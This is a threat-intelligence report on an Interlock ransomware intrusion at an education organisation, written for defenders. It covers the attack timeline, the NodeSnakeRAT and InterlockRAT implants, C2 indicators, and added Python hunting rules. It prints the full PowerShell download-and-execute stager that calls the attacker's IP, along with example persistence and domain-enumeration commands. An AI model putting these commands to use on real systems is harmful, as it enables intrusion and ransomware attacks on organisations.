The Interlock ransomware group continues to target organizations globally, with a pronounced focus on entities in the United Kingdom and the United States—particularly within the education sector. The FortiGuard Incident Response team remains engaged in monitoring the residual impact of earlier campaigns attributed to this threat actor. Unlike many prominent ransomware operations that rely on a Ransomware-as-a-Service (RaaS) framework, Interlock operates as a more centralized and self-contained group. The operators appear to develop and deploy their own tooling across much of the attack lifecycle, maintaining tighter operational control over their malware ecosystem. Notably, the group has demonstrated a capacity to evolve its tradecraft, adjusting techniques and tooling in response to defensive countermeasures. This analysis details a recent intrusion attributed to Interlock and underscores the necessity of proactive threat hunting to uncover persistent or latent compromises. Early-stage indicators observed during this investigation align directly with artifacts documented in a July campaign reported by the eSentire Threat Response Unit, as well as components of the Interlock malware ecosystem previously analyzed by Mandiant. Additionally, this investigation uncovered new indicators that defenders should incorporate into their detection strategies as the group continues refining its operational toolkit. Of particular significance, the group has introduced a newly developed process-termination utility that exploits a zero-day vulnerability in a gaming anti-cheat driver. In the observed intrusion, this capability was leveraged in an attempt to neutralize the victim’s endpoint detection and response (EDR) and antivirus (AV) protections.
Initial Access
On 31 March 2025, a North America–based education organization experienced an initial compromise attributed to a MintLoader infection. The intrusion originated from a user workstation that did not have endpoint detection and response (EDR) protection installed at the time. The compromise began with execution of a PowerShell command designed to dynamically retrieve and execute a remote payload. The command leveraged Invoke-Expression (iex) and Invoke-RestMethod (irm) to pull a second-stage script from a time-based URL hosted at 138[.]199[.]156[.]22:8080. The URL incorporated a Unix epoch-derived value, suggesting automated or programmatic payload generation. The command structure and infrastructure are consistent with activity previously linked to a TAG-124 traffic distribution system (TDS) campaign active during the same timeframe. Similar PowerShell patterns have been observed in prior Interlock ransomware intrusions, including reporting from Arctic Wolf. Interlock operators have historically leveraged TAG-124 infrastructure to selectively target victims across North America.
Following execution of the PowerShell stager:
- A file named download.zip was written to disk.
- The archive contained a legitimate Node.js runtime (node.exe).
- That runtime executed a malicious JavaScript payload, the NodeSnakeRAT implant:
  - File Name: j1wp4vw8.log
  - SHA1: 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0
- Payload Execution Command: `powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"`
NodeSnakeRAT operates as a staging implant, writing multiple secondary payloads to disk to facilitate follow-on activity. However, not all executed components generate file-system artifacts, meaning the observed payload set does not represent the complete scope of operator activity. Overall, this phase reflects a structured initial access workflow leveraging MintLoader delivery, time-based payload retrieval, legitimate runtime abuse (Node.js), and deployment of a modular access implant aligned with prior Interlock tradecraft.
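The following Python is an added illustration, not code from the original report or from Fortinet. It reproduces the stager's URL arithmetic (floor of the Unix epoch seconds, rounded down to a multiple of 16) so that a numeric path component seen in proxy logs can be mapped back to the 16-second window in which the request was generated, and it scores PowerShell command lines against the markers of this cradle. The sample command lines are constructed; the regexes, the scoring threshold and the helper names are the author's assumptions, not a published detection rule.

```python
import re
from datetime import datetime, timezone

# Stager host from the intrusion above, stored defanged and refanged only at match time.
KNOWN_STAGER_HOST = "138[.]199[.]156[.]22:8080".replace("[.]", ".")

# (regex, label) pairs. A single cradle keyword is routine admin activity; the combination
# of a hidden window, iex + irm, and epoch arithmetic in one command line is not.
STAGER_MARKERS = [
    (r"\biex\b|invoke-expression", "download cradle (iex)"),
    (r"\birm\b|invoke-restmethod", "download cradle (irm)"),
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window"),
    (r"\[datetime\]\s*:\s*:\s*utcnow", "epoch computation (UtcNow)"),
    (r"\.totalseconds\b", "epoch computation (TotalSeconds)"),
    (r"%\s*16\b", "16-second URL bucket"),
]

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def utc(*parts) -> datetime:
    """Build a timezone-aware UTC datetime, e.g. utc(2025, 3, 31, 12, 0, 5)."""
    return datetime(*parts, tzinfo=timezone.utc)


def stager_time_bucket(when: datetime) -> int:
    """Value the stager appends to its URL: floor(seconds since 1970) rounded down to a multiple of 16."""
    w = int((when - EPOCH).total_seconds())  # [math]::Floor($x) in the original command
    return w - (w % 16)                      # $w - ($w % 16)


def bucket_window(bucket: int):
    """(start, end) UTC window in which a given URL value would have been generated."""
    start = datetime.fromtimestamp(bucket, tz=timezone.utc)
    end = datetime.fromtimestamp(bucket + 16, tz=timezone.utc)
    return start, end


def looks_like_epoch_bucket(path_value: str, not_before: datetime, not_after: datetime) -> bool:
    """True if a URL path component is a 16-aligned epoch value inside the investigation window."""
    if not path_value.isdigit():
        return False
    v = int(path_value)
    return v % 16 == 0 and stager_time_bucket(not_before) <= v <= stager_time_bucket(not_after)


def classify_cmdline(cmdline: str) -> dict:
    """Score one PowerShell command line against the stager markers."""
    reasons = []
    for pattern, label in STAGER_MARKERS:
        if re.search(pattern, cmdline, re.IGNORECASE) and label not in reasons:
            reasons.append(label)
    known_host = KNOWN_STAGER_HOST in cmdline.replace("[.]", ".")
    if known_host:
        reasons.append("known stager host")
    both_cradles = sum(r.startswith("download cradle") for r in reasons) == 2
    epoch_math = any(r.startswith("epoch") or r.endswith("bucket") for r in reasons)
    suspicious = known_host or (both_cradles and ("hidden window" in reasons or epoch_math))
    return {"suspicious": suspicious, "reasons": reasons}


def triage(cmdlines) -> list:
    """Return (index, reasons) for every command line judged suspicious."""
    return [(i, classify_cmdline(c)["reasons"]) for i, c in enumerate(cmdlines) if classify_cmdline(c)["suspicious"]]


# Constructed sample input: the observed stager (host kept defanged) plus two benign commands.
SAMPLE_CMDLINES = [
    'powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime]::UtcNow; '
    "$y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; "
    '$w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"',
    'powershell -c "irm https://updates.example.invalid/status.json | ConvertFrom-Json"',
    'powershell -Command "Get-Service | Where-Object Status -eq Running"',
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_CMDLINES):
        print(idx, reasons)
    b = stager_time_bucket(utc(2025, 3, 31, 12, 0, 5))
    print(b, bucket_window(b))
```

When a proxy log shows a request to the stager host with a bare integer path, `looks_like_epoch_bucket` filters out values that cannot be this stager (not a multiple of 16, or outside the incident window), and `bucket_window` gives the 16-second interval to correlate with process creation events on the endpoint.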
Persistence and Follow-On Activity
On 31 March 2025, the threat actor established persistence for NodeSnakeRAT by creating an autorun registry entry labeled “ChromeUpdater” within the victim user’s profile. This entry was later modified to support updated NodeSnakeRAT payloads.
Three days after the initial execution of the first NodeSnakeRAT implant (j1wp4vw8.log, SHA1: 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0), a brief Remote Desktop Protocol (RDP) session was initiated on 3 April 2025. The connection originated from a temporarily assigned internal IP address and targeted the organization’s primary file server. The login utilized a default Administrator account that was not actively used by the organization.
On 21 April 2025, leveraging the existing NodeSnakeRAT foothold, the adversary deployed a second JavaScript-based implant:
- File Name: k4myle3i.dll
- SHA1: 6445E5CE51DA03934395ABB5411D3200D12ED7B3
This payload represents an earlier variant of Interlock RAT, also tracked as WINDYTWIST.SEA by Mandiant and identified as Interlock Backdoor by eSentire.
Operational Dormancy and Infrastructure Rotation
Available evidence indicates minimal adversary activity in the months following initial compromise. Significant activity resumed on 5 September 2025, shortly after the adversary rotated their command-and-control infrastructure on 4 September 2025.
The compromised endpoint during this period was a user laptop that was infrequently connected to the corporate network. It is assessed that the limited network exposure and non-overlapping connectivity windows likely prevented the threat actor from performing effective lateral movement during this time.
Phase Two – Data Access and Exfiltration (05–15 September 2025)
The second major phase of the intrusion began on 5 September 2025, when the victim’s Managed Detection and Response (MDR) service identified a similar NodeSnakeRAT infection chain on an internal application server.
Because the affected system was an internal server, no evidence of MintLoader or external initial access mechanisms was observed. Additionally, the reuse of the same Node.js runtime and related JavaScript payloads indicated this activity was a continuation of the earlier compromise rather than a new intrusion.
Using the existing foothold, the adversary deployed another Interlock RAT implant disguised as a log file:
- File Name: node.log
- SHA1: 2D5F88C396553669BD50183644D77AD3C71D72BB
This implant contained newly hardcoded command-and-control infrastructure, indicating an evolution in tooling and operational configuration.
Attack Lifecycle Overview
1. Initial Access
- Delivery via malicious loader (e.g., MintLoader).
- Execution of obfuscated PowerShell commands.
- Retrieval of second-stage payloads from external infrastructure.
2. Persistence
- Scheduled task creation for persistence.
- Registry autorun key modifications.
- Deployment of remote administration or RAT components.
3. Defense Evasion
- Use of a custom process-killing tool.
- Exploitation of a zero-day vulnerability in a legitimate gaming anti-cheat driver.
- Attempts to disable EDR and antivirus services.
4. Discovery and Lateral Movement
- Enumeration of domain users and administrators.
- Network share discovery.
- Use of native Windows utilities for movement.
5. Collection and Exfiltration
- Bulk data collection prior to encryption.
- Exfiltration to external command-and-control (C2) servers.
6. Impact
- Deployment of Windows and Linux ransomware encryptors.
Example Commands
- cmd.exe /c schtasks /create /sc onlogon /tn "Updater" /tr "C:\Users\Public\updater.exe"
- wmic process call create "C:\Users\Public\payload.exe"
- net user /domain
- net group "Domain Admins" /domain
Persistence Indicators
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<malicious_entry>
- Scheduled Task: "Updater" or similarly disguised system task
Defense Evasion Indicators
- Unsigned or suspicious driver loading activity.
- Abnormal termination of EDR/AV processes.
- Driver exploitation linked to gaming anti-cheat software.
Network Indicators
Investigations identified outbound connections to attacker-controlled infrastructure. Organizations should review logs for:
- Outbound HTTP/HTTPS traffic to newly registered domains.
- Connections to VPS-hosted IP addresses with no prior business justification.
- Beaconing intervals indicative of RAT activity.
Below is a summary of the payloads observed during deployment on the victim's systems:
| Function | File (Name + SHA1) | File Path | Embedded C2 | First Observed |
|---|---|---|---|---|
| NodeSnakeRAT | j1wp4vw8.log, 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0 | C:\Users\victim_user\AppData\Roaming\node-v22.11.0-winx64\j1wp4vw8.log | 216[.]245.184.181, 212[.]237.217.182, 168[.]119.96.41, suffering-arnold-satisfaction-prior[.]trycloudflare.com, speak-head-somebody-stays[.]trycloudflare.com, mortgage-i-concrete-origins[.]trycloudflare.com, una-idol-ta-missile[.]trycloudflare.com, strain-brighton-focused-kw[.]trycloudflare.com, musicians-implied-less-model[.]trycloudflare.com | 31-March-2025 |
| InterlockRAT | k4myle3i.dll, 6445E5CE51DA03934395ABB5411D3200D12ED7B3 | C:\Users\victim_user\AppData\Roaming\3o55fai8\k4myle3i.dll | 45[.]61.136.109, 128[.]140.120.188, 177[.]136.225.135 | 21-April-2025 |
| NodeSnakeRAT | 05x3aay1.log, 677151B9864F8D01DE3C1557B1402AF7EF99AE3D | C:\Users\victim_user\AppData\Roaming\node-v22.11.0-winx64\05x3aay1.log | 37[.]27.216.30, 66[.]85.173.36, 146[.]70.79.43, nedy-throwing-knock-whats[.]trycloudflare[.]com, oclc-publishing-individual-maps[.]trycloudflare[.]com, cf1-winows-ww[.]com, time-syncmicrosoft[.]com, microsoft-iplcloud[.]com, sublime-tragedy-counties-sculpture[.]trycloudflare[.]com, champagne-businesses-hand-theta[.]trycloudflare[.]com, assets-msnds[.]org, settings-win-datamicrosoft[.]org, settings-datamicrosoft[.]org, periodic-priest-games-assessed[.]trycloudflare[.]com, uncertainty-por-bubble-persian[.]trycloudflare[.]com, eventsdatamicrosoft[.]org, dns-teams-windows[.]live, sync-time-win[.]live | 22-May-2025 |
| G-zip archive (Java env + jucheck.jar) | 9gesu23g.log, F381C897A54B1A0A41D41F279ABA1B7C13E3F901 | C:\Users\victim_user\AppData\Roaming\ywgomm2t\9gesu23g.log | n/a | 24-June-2025 |
| InterlockRAT | aqwsxvvz.log, F3C2BDB4484F66213556B2CD5F114CE4F4A9DD86 | C:\Users\victim_user\AppData\Roaming\dji8zg3d\aqwsxvvz.log | 157[.]250.195.229, 216[.]219.95.234, 91[.]98.29.99 | 04-September-2025 |
| InterlockRAT | g86oofvm.dll, F3C2BDB4484F66213556B2CD5F114CE4F4A9DD86 | C:\Users\victim_user\AppData\Roaming\ro5ryxiu\g86oofvm.dll | 157[.]250.195.229, 216[.]219.95.234, 91[.]98.29.99 | 04-September-2025 |
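As an added hunting example that is not part of the report, the following Python re-fangs a subset of the indicators from the table above and applies them, together with the behavioural tell common to every Node.js row (node.exe running from a user-profile copy of the runtime and being handed a .log or .dll file as its script), to constructed DNS, proxy, process and file events. The flat key=value log format, the host names and the sample events are assumptions made for illustration; the hashes, IPs and domains are copied from the table.

```python
import re

# Indicators copied from the payload table, kept defanged as published.
DEFANGED_C2 = [
    "157[.]250.195.229", "216[.]219.95.234", "91[.]98.29.99",
    "37[.]27.216.30", "66[.]85.173.36", "146[.]70.79.43",
    "nedy-throwing-knock-whats[.]trycloudflare[.]com",
    "time-syncmicrosoft[.]com", "settings-win-datamicrosoft[.]org",
    "dns-teams-windows[.]live",
]
KNOWN_SHA1 = {
    "63fd5e0811c0bcc7df9fc3d712f39f829a8d6ff0": "NodeSnakeRAT (j1wp4vw8.log)",
    "677151b9864f8d01de3c1557b1402af7ef99ae3d": "NodeSnakeRAT (05x3aay1.log)",
    "6445e5ce51da03934395abb5411d3200d12ed7b3": "InterlockRAT (k4myle3i.dll)",
    "f3c2bdb4484f66213556b2cd5f114ce4f4a9dd86": "InterlockRAT (aqwsxvvz.log / g86oofvm.dll)",
}
# Runtime directory under %AppData% that appears in every NodeSnakeRAT path in the table.
NODE_RUNTIME_DIR = r"\appdata\roaming\node-v22.11.0-winx64"
# node.exe given a .log or .dll file as its script argument.
NODE_ODD_SCRIPT = re.compile(r'node\.exe"?\s+"?([^"\s]+\.(?:log|dll))\b', re.IGNORECASE)


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


# One anchored regex per indicator so that 91.98.29.99 does not match inside 191.98.29.99.
C2_PATTERNS = [
    re.compile(r"(?<![\w-])" + re.escape(refang(x)) + r"(?![\w-])", re.IGNORECASE)
    for x in DEFANGED_C2
]


def scan_event(line: str) -> list:
    """Reasons an event line matches the Interlock indicators (empty list if clean)."""
    reasons = []
    low = refang(line).lower()
    for pat in C2_PATTERNS:
        m = pat.search(low)
        if m:
            reasons.append(f"known C2: {m.group(0)}")
    for sha1, label in KNOWN_SHA1.items():
        if sha1 in low:
            reasons.append(f"known hash: {label}")
    if NODE_RUNTIME_DIR in low:
        reasons.append("Node.js runtime staged under the user profile")
    m = NODE_ODD_SCRIPT.search(line)
    if m:
        reasons.append(f"node.exe executing a non-.js file: {m.group(1)}")
    return reasons


def hunt(lines) -> list:
    """(1-based line number, reasons) for every line that matched at least one indicator."""
    hits = []
    for i, line in enumerate(lines, 1):
        reasons = scan_event(line)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample telemetry: four lines modelled on the September activity, three benign.
SAMPLE_EVENTS = [
    r'2025-09-05T10:13:50Z host=APPSRV01 type=process image=C:\Users\victim_user\AppData\Roaming\node-v22.11.0-winx64\node.exe cmdline="node.exe C:\Users\victim_user\AppData\Roaming\node-v22.11.0-winx64\node.log"',
    r'2025-09-05T10:14:02Z host=APPSRV01 type=dns qname=nedy-throwing-knock-whats.trycloudflare.com',
    r'2025-09-05T10:14:03Z host=APPSRV01 type=proxy dst=157.250.195.229:443 action=allow',
    r'2025-09-05T10:15:10Z host=APPSRV01 type=file path=C:\Users\victim_user\AppData\Roaming\ro5ryxiu\g86oofvm.dll sha1=f3c2bdb4484f66213556b2cd5f114ce4f4a9dd86',
    r'2025-09-05T10:16:00Z host=WS-042 type=dns qname=www.example.com',
    r'2025-09-05T10:16:01Z host=WS-042 type=proxy dst=203.0.113.5:443 action=allow',
    r'2025-09-05T10:17:00Z host=WS-042 type=process image=C:\Program Files\nodejs\node.exe cmdline="node.exe build.js"',
]

if __name__ == "__main__":
    for lineno, reasons in hunt(SAMPLE_EVENTS):
        print(lineno, "; ".join(reasons))
```

The behavioural rules are the ones worth keeping after the listed infrastructure rotates: a Node.js runtime unpacked under a user's roaming profile, and node.exe launching a file whose extension disguises it as a log or library, survive a change of C2 addresses.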
File & Artifact Indicators
- Ransom note files dropped post-encryption.
- Encrypted files appended with extensions such as:
  - .gif
  - .!nt3rlock
- Malware loaders and executables in:
  - C:\Users\Public\
  - %AppData%\
  - %ProgramData%\
Detection Recommendations
- Monitor PowerShell activity with command-line logging enabled.
- Alert on unsigned driver loads or abnormal driver behavior.
- Inspect scheduled task creation events (Event ID 4698).
- Correlate unusual outbound traffic with newly observed domains or IP addresses.
- Hunt for abnormal termination of security processes.
Mitigation Recommendations
- Apply security updates to endpoint and server infrastructure.
- Restrict administrative privileges using least privilege principles.
- Enable tamper protection on EDR/AV solutions.
- Implement network segmentation and outbound traffic filtering.
- Conduct proactive threat hunting based on known Interlock TTPs.
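The following Python is an added example, not code from the report, applying two of the persistence items above (the Run-key autorun value, as with the "ChromeUpdater" entry, and scheduled task creation, Event ID 4698) to constructed Sysmon Event ID 13 and Security 4698 records. The simplified dict representation of the events, the SID, the benign OneDrive and Contoso entries, and the scoring rules are assumptions; the field names follow the Windows event fields, and the scheduled task XML uses the Task Scheduler schema namespace that 4698 TaskContent carries.

```python
import re
import xml.etree.ElementTree as ET

SCRIPT_HOSTS = ("node.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "powershell.exe")
WORLD_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\")
# A launch command whose argument is a .log/.dll/.js/.txt file is the pattern seen with the Node.js implants.
ODD_PAYLOAD_EXT = re.compile(r"\S+\.(?:log|dll|js|txt)\b", re.IGNORECASE)


def _local(tag: str) -> str:
    """Strip the Task Scheduler XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def command_reasons(command: str) -> list:
    """Why an autorun/task command line is suspicious (empty if nothing stands out)."""
    reasons = []
    low = command.lower()
    if any(h in low for h in SCRIPT_HOSTS):
        reasons.append("launches a script host")
    if any(d in low for d in WORLD_WRITABLE):
        reasons.append("runs from a world-writable directory")
    m = ODD_PAYLOAD_EXT.search(command)
    if m:
        reasons.append(f"non-executable payload argument: {m.group(0)}")
    return reasons


def flag_run_key(event: dict) -> list:
    """Sysmon Event ID 13 (registry value set): inspect values written under a Run key."""
    if event.get("EventID") != 13:
        return []
    target = event.get("TargetObject", "")
    if "\\currentversion\\run\\" not in target.lower():
        return []
    name = target.rsplit("\\", 1)[-1]
    return [f"Run value '{name}': {r}" for r in command_reasons(event.get("Details", ""))]


def flag_scheduled_task(event: dict) -> list:
    """Security Event ID 4698 (scheduled task created): inspect the task's Exec action and trigger."""
    if event.get("EventID") != 4698:
        return []
    root = ET.fromstring(event.get("TaskContent", "<Task/>"))
    elements = list(root.iter())
    commands = [el.text or "" for el in elements if _local(el.tag) in ("Command", "Arguments")]
    reasons = command_reasons(" ".join(commands))
    if reasons and any(_local(el.tag) == "LogonTrigger" for el in elements):
        reasons.append("fires at logon")
    return [f"Task {event.get('TaskName', '?')}: {r}" for r in reasons]


def review_persistence(events) -> list:
    """Run both rules over a batch of events and collect the findings."""
    findings = []
    for ev in events:
        findings.extend(flag_run_key(ev))
        findings.extend(flag_scheduled_task(ev))
    return findings


# Constructed sample events: one malicious and one benign of each kind.
SAMPLE_EVENTS = [
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater",
     "Details": r"C:\Users\victim_user\AppData\Roaming\node-v22.11.0-winx64\node.exe C:\Users\victim_user\AppData\Roaming\node-v22.11.0-winx64\j1wp4vw8.log"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\victim_user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 4698, "TaskName": r"\Updater",
     "TaskContent": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Users\Public\updater.exe</Command></Exec></Actions>
</Task>"""},
    {"EventID": 4698, "TaskName": r"\Contoso\AgentMaintenance",
     "TaskContent": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Contoso\agent.exe</Command><Arguments>/maintain</Arguments></Exec></Actions>
</Task>"""},
]

if __name__ == "__main__":
    for finding in review_persistence(SAMPLE_EVENTS):
        print(finding)
```

The rules deliberately do not key on the value name: "ChromeUpdater" and "Updater" are chosen to blend in, so the signal is where the autorun points (a script host, a world-writable directory, a payload disguised with a non-executable extension) rather than what it is called.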
Interlock continues to evolve its techniques while maintaining a consistent operational methodology. The integration of zero-day exploitation, custom tooling, and targeted exfiltration underscores the need for proactive monitoring, robust endpoint defenses, and structured threat hunting programs.